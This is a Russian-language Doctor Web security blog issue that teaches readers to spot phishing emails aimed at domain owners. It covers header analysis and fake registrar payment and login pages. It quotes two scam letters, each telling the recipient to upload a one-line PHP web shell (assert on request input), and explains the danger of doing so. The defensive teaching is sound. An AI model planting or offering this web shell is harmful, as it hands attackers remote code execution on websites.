-
добавить в избранное
ВА-ЖН-ЫЕ ПИ-СЬ-МА
16 мая 2019
Некоторые темы для киберпреступников являются поистине вечнозелеными. Мы уже писали о мошеннических рассылках владельцам доменов – и вот, пошла вторая волна. Значит, пришло время еще раз написать о том, как распознать спам в письме от доверенного на первый взгляд отправителя.
Проанализируем мошенническую рассылку на примере письма, которое пришло в компанию «Доктор Веб» (у нас тоже пытались увести домен, представляете?).
Первое, на что обращаем внимание, – имя отправителя в строке почтового клиента и в открытом письме различается. Причем в строке почтового клиента вид отправителя (R-U-C-ENT-ER), мягко говоря, намекает на спам.
Вторая странность – получатель. Письмо пришло на marketing@drweb.com – странный адрес для такого письма. Письма такого рода должны приходить на адрес ответственного лица либо в крайнем случае на какой-нибудь admin@. Но уж никак не на маркетинг. Видимо, мошенники рассчитывают, что недалекие маркетологи перешлют письмо в бухгалтерию. Но они ошиблись!
Далее мы видим стандартный признак писем фишеров – создание паники. Вы должны оплатить услугу в течение одного дня. СРОЧНО!!!
Обычно подобные уведомления приходят задолго до окончания срока регистрации домена. Вот пример от одного из провайдеров (достаточно старый пост, рассылка идет уже, наверно, года четыре – и за это время в ней не поменялось ни слова).
Также обращаем ваше внимание на то, что мы напоминаем о необходимости продления домена за 54, 30, 14, 7 и 2 дня до истечения срока регистрации.
Чтобы удостовериться в безосновательности угроз мошенников, проверьте, когда на самом деле истекает срок регистрации вашего домена:
- для доменов в зонах .RU, .SU, .РФ воспользуйтесь сервисом whois (графа Дата окончания регистрации);
- для доменов в международных зонах обратитесь в нашу службу поддержки для получения информации.
У разных провайдеров услуг сроки уведомления могут различаться, но в любом случае вас уведомят не за день, а гораздо раньше.
Далее перейдем к анализу служебных заголовков, о них мы писали в нескольких выпусках.
Наряду с информацией, видимой получателем письма, – полями «От», «Кому», «Тема» и т. д., каждое письмо содержит служебную информацию, обычно не показываемую пользователю, но необходимую для успешной доставки письма. Наиболее информативны служебные заголовки – информация, в которой указаны адреса отправителя и получателя, маршрут движения письма, кодировки, тема письма и т. п. Антивирусные и антиспам-системы также оставляют там свои пометки. Вся эта информация передается почтовыми системами в самом начале процедуры отправки сообщения, поэтому и называется заголовком. Почтовые программы отделяют эту информацию от тела письма и скрывают ее от пользователя, отображая лишь немногие поля – те самые «От», «Кому» и «Тема».
В разных почтовых клиентах (и даже разных версиях одного клиента) служебные заголовки письма открываются разными способами. Рекомендуем посмотреть инструкции, например, здесь.
Напомним, что тот адрес, который вы видите в поле «От», ничего не значит, это по сути просто текст. В пересылке письма он не участвует. Злоумышленник (да, собственно, и вы тоже) может прописать туда все, что угодно. Настоящий адрес отправителя (хотя и его можно подделать) прописан именно в служебных заголовках. В данном случае это:
Return-Path: <apgbpl@genesis.thewebpeople.asia>
Чуть ниже можно найти еще немного информации об отправителе:
Received-SPF: none client-ip=117.120.7.123; envelope-from=apgbpl@genesis.thewebpeople.asia; helo=acespex.com.sg
Не правда ли, совсем не похоже на то, что вы увидели в приведенном выше примере? Как минимум доменная зона (то, что находится после знака@) должна совпадать с доменом вашего регистратора – чего явно не наблюдается.
Информацию о почтовом отправителе также можно узнать в служебных заголовках:
X-Mailer: Microsoft Windows Live Mail 15.4.3538.513
Странный почтовый клиент для России.
В разных письмах набор полей также может отличаться, но в случае сомнений заглянуть в него всегда стоит.
Далее: оплата. Нажимать на кнопку, конечно, не стоит – мало ли что по ссылке. Но уж экспериментировать, так экспериментировать.
Кнопка Оплатить ведет на ресурс, не связанный с регистратором вашего домена. Еще пример рекомендаций:
2) Ссылка ведет на перевод в кошелек Яндекс – регистраторы так не работают.
Но предположим, что админа сейчас в вашей организации в пределах доступности нет. В таком случае вы всегда можете самостоятельно проверить даты окончания регистрации. Сделать это можно через один из многочисленных сервисов whois (о них мы также уже писали). Если вы хотите найти подобный сервис, то поисковике вводим слово whois и выбираем понравившийся. Далее вводим имя вашего домена и смотрим необходимую вам дату.
Раз уж нам говорят, что у virus-encyclopedia.ru всё плохо, проверим информацию по этому домену.
Как видим, ровно год нам еще не о чем беспокоиться.
Рассмотренное выше мошенничество достаточно безобидно. Максимум что вы потеряете, так это деньги. Но среди схожих схем мошенничества есть и куда более опасные. Вот пример:
на электронную почту девушки приходит письмо от RU-CENTER, в котором указано, что заказана услуга смены регистратора домена, и что она произойдёт в течение 72 часов. Письмо абсолютно стандартное, я сравнил его с обычными письмами регистратора, внешних отличий не обнаружил. Удалось их увидеть только открыв исходник, со всеми хидерами.
В тексте дана стандартная ссылка для входа в интерфейс RU-CENTER, чтобы подтвердить или отменить "услугу". Если заказать в Руцентре подтверждение E-Mail, например, придёт очень похожее письмо с очень похожей ссылкой. По клику на ссылку открывается интерфейс Руцентра, где нужно ввести логин и пароль для входа в админку. Всё как обычно (разве что кодировка "уехала").
ссылка ведёт не на NIC.ru, а на левый сайт vicousfun.com, ввести можно любую абракадабру вместо логина и пароля, и всё равно произойдёт вход. Рассчитано всё это на то, что нажавший ссылку введёт свой настоящий логин и пароль, злоумышленники его запишут и смогут использовать для входа уже в настоящий RU-CENTER.
Кликнув по ссылке, вы в дополнение к прочим проблемам можете установить себе на компьютер любую заразу.
Еще более опасный вариант:
Уважаемый клиент!
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом 4memo.ru осуществляется лицом, указанным в качестве его администратора.
Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1z8afzuzthnjyo0.php со следующим содержимым:
<?php
assert(stripslashes($_REQUEST[R01]));
?>
Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 27 января 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.
Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.
Источник 1, 2, 3
Это уже атака. Злоумышленники просят создать в корневой директории сайта вредоносный файл, делать этого ни в коем случае нельзя! Они предлагают разместить код с функцией assert – эта функция выполняет код из параметра, а параметр злоумышленник может передать любой по GET/POST запросу ($_REQUEST[RUCENTER] – именно параметр от клиента).
Отметим, что подобные письма могут приходить не только от имени регистраторов.
Здравствуйте.
Вы получили данное уведомление от Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором доменного имени www.yandex.ru в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ «О внесении изменений в Федеральный закон „Об информации, информационных технологиях и о защите информации“ и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2 1618/2015, Ваш сайтwww.yandex.ru был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».
Для идентификации Вас, как администратора доменного имени www.yandex.ru, Вам необходимо:
- Cоздать в корневой директории Вашего сайта папку reestr
- Cоздать в данной папке файл reestr-id198617.php, содержащий следующий текст:
< ?php
/*Подтверждение доменного имени www.yandex.ru*/
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: www.yandex.ru/reestr/reestr-id128032.php
Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени www.yandex.ru, следую инструкции указанной выше, то Ваш сайт www.yandex.ru будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации.
— С уважением,
ФЕДЕРАЛЬНАЯ СЛУЖБА ПО НАДЗОРУ В СФЕРЕ СВЯЗИ, ИНФОРМАЦИОННЫХ ТЕХНОЛОГИЙ И МАССОВЫХ КОММУНИКАЦИЙ.
При переходе на адрес roskomnadzor.org пользователя перекидывает на rkn.gov.ru что создает иллюзию реального сайта и домена. Домен roskomnadzor.org был зарегистрирован 6 дней назад.
По последней ссылке есть разбор о том, что в результате атаки могут внедрить злоумышленники.
#почта #спам #антиспам #мошенническое_письмо #социальная_инженерия #фишинг
Антивирусная правДА! рекомендует
- Установите антиспам.
- Будьте внимательны, открывая электронные письма.
Если вы оплатили продление домена в пользу мошенников, для защиты своих прав и возврата средств вам следует обратиться с заявлением в отдел «К» МВД России. Образец заявления доступен для скачивания по ссылке.
|
Оцените выпуск Чтобы проголосовать зайдите в аккаунт на сайте или создайте его, если аккаунта еще нет.
|
Сделайте репост
|
![[ВКонтакте]](http://st.drweb.com/static/new-www/social/no_radius/vkontakte.png)
![[Twitter]](http://st.drweb.com/static/new-www/social/no_radius/twitter.png)
Необходимо войти на страницу выпуска через аккаунт на сайте «Доктор Веб» (или создать аккаунт). Аккаунт должен быть связан с вашим аккаунтом в социальной сети. Видео о связывании аккаунта.
Нам важно ваше мнение
Чтобы оставить комментарий, нужно зайти через свой аккаунт на сайте «Доктор Веб». Если аккаунта еще нет, его можно создать.
Комментарии пользователей
Andromeda
22:17:15 2019-07-09
Альфа
21:28:17 2019-07-09
Ilya
14:45:30 2019-06-05
zitkss
14:33:16 2019-05-22
I46
15:30:54 2019-05-21
Неуёмный Обыватель
14:01:06 2019-05-17
razgen
01:20:19 2019-05-17
Rider
00:36:54 2019-05-17
Lia00
23:41:58 2019-05-16
Korney
23:07:47 2019-05-16
eaglebuk
22:29:31 2019-05-16
DrKV
22:10:40 2019-05-16
orw_mikle
21:04:03 2019-05-16
Valerio
21:02:01 2019-05-16
anatol
20:48:14 2019-05-16
Шалтай Александр Болтай
20:31:22 2019-05-16
Шалтай Александр Болтай
20:25:00 2019-05-16
Edward Gord
19:51:16 2019-05-16
tigra
19:48:46 2019-05-16
Serg07
19:41:58 2019-05-16
Пaвeл
18:09:29 2019-05-16
Подробнее: https://www.securitylab.ru/news/499119.php
Денисенко Павел Андреевич
18:05:52 2019-05-16
Пaвeл
18:05:20 2019-05-16
Toma
15:56:31 2019-05-16
Геральт
15:28:33 2019-05-16
Masha
15:10:16 2019-05-16
marisha-san
13:33:56 2019-05-16
Татьяна
13:31:13 2019-05-16
robot
13:11:53 2019-05-16
sanek-xf
12:53:03 2019-05-16
Natalya_2017
12:49:05 2019-05-16
vinnetou
12:30:10 2019-05-16
Dmur
12:18:10 2019-05-16
Alexander
10:32:17 2019-05-16
А внимательность, конечно, она и при варке кофе нужна, иначе, сбежит от тебя вкусный любимый напиток...
А что если на подобное "предупреждающее" письмо в ответе инициатору сообщать, что вашей фирмой заключен договор с посредником на предварительное рассмотрение всей входящей корреспонденции?! И дать ссылку на эл.почту отдела «К» МВД России?!
Ну а уж создавать по указке "не знамо от кого" какие-либо файлы и папки, - это как "пить воду из копытца", - почти наверняка "козлёночком" станешь...
Посему, как ни крути, а без Dr.Web Security Space и Антивирусной правды ну ни как не обойтись!
P.S. Кстати, о внимательности... вчера 15 мая компания «Доктор Веб» объявила Акцию, которая пройдет с 15 по 28 мая, - «1 год за 0 рублей с Dr.Web»: при покупке лицензии Dr.Web Security Space для 1 ПК на 2 года вы платите лишь за один год защиты.
Неуёмный Обыватель
10:08:24 2019-05-16
EvgenyZ
09:58:18 2019-05-16
maestro431
08:56:22 2019-05-16
vkor
08:42:04 2019-05-16
Пaвeл
08:38:48 2019-05-16
dyadya_Sasha
08:03:07 2019-05-16
Oleg
07:31:25 2019-05-16
Vlad X
07:25:24 2019-05-16
сразу в спам.
Korney
06:50:04 2019-05-16
Любитель пляжного футбола
06:18:38 2019-05-16
ka_s
05:23:53 2019-05-16
Morpheus
05:07:04 2019-05-16
achemolganskiy
04:41:29 2019-05-16
SGES
03:33:13 2019-05-16
Sasha50
03:26:15 2019-05-16